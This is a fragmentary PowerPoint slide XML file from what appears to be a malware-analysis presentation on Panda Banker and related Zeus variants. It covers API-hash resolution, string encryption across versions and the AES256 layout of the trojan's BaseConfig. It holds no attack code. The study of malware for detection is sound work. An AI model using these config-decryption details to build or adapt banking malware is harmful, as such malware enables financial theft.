          <a:ext cx="4224782" cy="38753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52002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API Function Calls (2.1.0 - 2.5.7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974A1696-9B3B-DE43-AA02-5F41669F40D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1371600"/>
            <a:ext cx="10972800" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; import binascii</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; print "0x%x" % (binascii.crc32("wvnsprintfW") &amp; 0xffffffff)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x81beee11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4294765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CB86D7C0-5FB0-0245-816A-276010163B59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="152400"/>
            <a:ext cx="9144000" cy="5821362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EF66165-1E8A-3047-9B55-4D473E30B5F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="5973762"/>
            <a:ext cx="4133439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source: Renee di Cherri (@reneedicherri)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="903292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API Function Calls (2.1.0 - 2.5.7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{059E1C63-8A2B-564C-BCE1-213ECFA8A62A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190625" y="1143000"/>
            <a:ext cx="9810750" cy="5118100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2207938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Encrypted Strings (2.1.0 – 2.2.9)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CDD734-6E0E-9D4B-8490-6D7626A8AE38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="613012" y="990600"/>
            <a:ext cx="7029450" cy="5296351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3152842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Encrypted Strings (2.2.10 – 2.5.7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C01C2F-3FC2-5445-8788-7809B4AE0393}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1066800"/>
            <a:ext cx="7378700" cy="5372704"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3762807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Encrypted Strings (2.6.0 – present)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B955135-79C2-DF43-9D68-6F829C57283C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="10763250" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="565528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Encrypted Strings (2.6.10)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC5D72EA-42E2-2F46-873E-B6A379E18466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="403135" y="1143000"/>
            <a:ext cx="11385729" cy="5105400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3627691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BaseConfig (generic Zeus)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9620E637-8705-A242-8807-4B3F8655E7C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1295400"/>
            <a:ext cx="8065686" cy="4544704"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391721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BaseConfig (ZeusVM variants)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7222AFC-24AD-3645-9167-74621BD3A616}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1143000"/>
            <a:ext cx="7734300" cy="5212862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1027683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BaseConfig (Panda Banker)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{503EA295-1033-0642-9234-6C2780388676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1143000"/>
            <a:ext cx="7912100" cy="5159411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348393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Decrypting the BaseConfig (2.1.0 – 2.2.9)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1371600"/>
            <a:ext cx="5334000" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x0: SHA256 digest (32 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x20: AES256 key (32 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x40: AES256 IV (16 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x50: AES256 CBC encrypted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="65532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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE78CF0B-E4E5-3D47-9269-8B200F422C73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3157538"/>
            <a:ext cx="11163300" cy="2794000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="441642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Decrypting the BaseConfig (2.3.1 – present)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1371600"/>
            <a:ext cx="5334000" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x0: SHA256 digest (32 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x20: key offset (1 byte)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Varies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x20 + key offset </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0xd6: AES256 key (32 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x140: AES256 IV (16 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x150: AES256 CBC encrypted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="65532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936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Naming (Malware)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{675D6552-DD92-084F-B79A-1147D62E8ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1524000"/>
            <a:ext cx="7851962" cy="1955800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EB7ACDC-52FC-684E-AEEA-B82AFB22F8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 y="4267200"/>
            <a:ext cx="2857500" cy="787400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99E324F8-6163-AA4E-8560-4B4FA6F825D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1383632" y="974558"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162113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Decrypting the BaseConfig (2.3.1 – present)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="65532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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE58EA53-23FE-5042-8CB9-3B0D5E5531C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1143000"/>
            <a:ext cx="8024681" cy="5219673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4005576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BaseConfig Botnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24CDF487-E441-524B-88A7-ADC109C6F630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1447800"/>
            <a:ext cx="11545400" cy="1937413"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1537997263"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6248400" y="1676400"/>
          <a:ext cx="4224782" cy="38753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12903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Static Botnets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="62484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E5013F2F-88F6-DE43-8B69-831DAE627744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628775" y="1023272"/>
            <a:ext cx="8934450" cy="5181600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84056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Static Botnets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="62484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095082D6-3FD5-074C-85FF-36C378A51562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2894876401"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="12192000" cy="51054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58991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BaseConfig Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="62484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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED023072-79EC-AC4C-B09F-99DA16F68D68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611875" y="1192367"/>
            <a:ext cx="8473023" cy="4843410"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3986947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BaseConfig Keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="62484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1A9F4F42-BF19-E04A-A6C2-F46EE0F63238}"/>
